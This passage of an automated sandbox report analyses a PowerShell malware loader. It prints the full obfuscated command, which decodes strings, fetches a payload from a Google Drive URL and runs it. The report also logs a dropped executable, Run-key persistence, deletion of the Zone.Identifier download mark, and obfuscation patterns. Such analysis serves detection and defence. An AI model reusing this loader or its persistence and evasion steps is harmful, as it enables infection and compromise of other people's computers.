r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael	Jump to behavior

Binary contains a suspicious time stamp

Source: newfile.exe.10.dr

Static PE information: 0x853858FE [Sun Oct 28 18:42:06 2040 UTC]

PE file contains sections with non-standard names

Source: newfile.exe.10.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348900BD pushad ; iretd	2_2_00007FFD348900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34897967 push ebx; retf	2_2_00007FFD3489796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348909A2 push E85E535Dh; ret	2_2_00007FFD348909F9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04F645F7 push ss; retn 0007h	5_2_04F64602
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04F64529 push es; retn 0007h	5_2_04F64552
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_04F66998 push eax; retn 0007h	5_2_04F669A1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07DD0638 push eax; mov dword ptr [esp], ecx	5_2_07DD0AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07DD0AB8 push eax; mov dword ptr [esp], ecx	5_2_07DD0AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_07DDE8C0 pushfd ; ret	5_2_07DDEDA3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09650D13 push edx; iretd	5_2_09650D14
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09651CF8 pushfd ; ret	5_2_09651CF9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0965134D pushfd ; iretd	5_2_0965135A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09650E72 pushfd ; retf	5_2_09650E89
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09654AE0 push ds; retf	5_2_09654B10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09650EF9 push cs; retf	5_2_09650F0A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09650AA1 push ecx; ret	5_2_09650AA3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04061CF8 pushfd ; ret	10_2_04061CF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04060D13 push edx; iretd	10_2_04060D14
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04060E72 pushfd ; retf	10_2_04060E89
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04060AA1 push ecx; ret	10_2_04060AA3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04064AE0 push ds; retf	10_2_04064B10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_04060EF9 push cs; retf	10_2_04060F0A
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_0406134D pushfd ; iretd	10_2_0406135A
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Code function: 12_2_003813F8 pushfd ; retf	12_2_003813F9
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Code function: 12_2_0038376D push ecx; ret	12_2_00383780

Drops PE files

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File created: C:\Users\user\AppData\Roaming\newfile\newfile.exe

Jump to dropped file

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run newfile			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

File opened: C:\Users\user\AppData\Roaming\newfile\newfile.exe:Zone.Identifier read attributes | delete

Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
